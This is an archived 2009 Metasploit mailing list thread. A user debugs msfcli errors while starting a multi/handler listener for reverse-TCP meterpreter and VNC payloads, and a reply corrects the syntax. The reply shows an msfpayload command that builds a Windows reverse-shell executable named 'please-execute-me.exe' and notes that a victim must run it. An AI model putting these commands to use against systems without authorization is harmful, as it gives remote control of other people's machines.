Metasploit mailing list archives
msfcli
From: krasn at ans.gr (Nicolas Krassas)
Date: Sat, 28 Mar 2009 19:09:07 +0200
Anastasios, true i notice it much later. Thanks ----- Original Message ----- From: Anastasios Monachos To: Nicolas Krassas Cc: framework at spool.metasploit.com Sent: Saturday, March 28, 2009 4:24 PM Subject: Re: [framework] msfcli Nicolas, 2009/3/27 Nicolas Krassas <krasn at ans.gr> Greetings, I've encountered a strange problem on msfcli, i'm pasting the lines below, root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx E [*] Please wait while we load the module tree... ./msfcli:150: undefined method `datastore' for nil:NilClass (NoMethodError) It is meterpreter not metepreter, you missed the "r" root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [-] Exploit failed: Here above i just pressed ctrl c to interrupt the cli Syntax is corrent, but your victim needs somehow to execute the appropriate payload, you can build it using msfpayload as: ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > please-execute-me.exe root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx LPORT 4444 DisableCourtesyShell=TRUE E [*] Please wait while we load the module tree... ./lib/msf/core/data_store.rb:93:in `each': The argument could not be parsed correctly. (Rex::ArgumentParseError) from ./lib/msf/core/data_store.rb:93:in `import_options_from_s' from ./msfcli:140 Again error when i'm using the correct ip address of the host, Wrong syntax, you have missed the equal sign in the LPORT parameter, it should be LPORT=4444 ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp E [*] Please wait while we load the module tree... [-] Exploit failed: The following options failed to validate: LHOST. And finally root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=91.xxx.xx.xxx E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... Syntax corrent, all you need to do, it make the victim execute the payload, as described previously... The commands where used one after the other, no change was done on the system in between. Regards, Dinos _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework Hope the above would work for you. -- AM -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090328/febec06a/attachment.htm>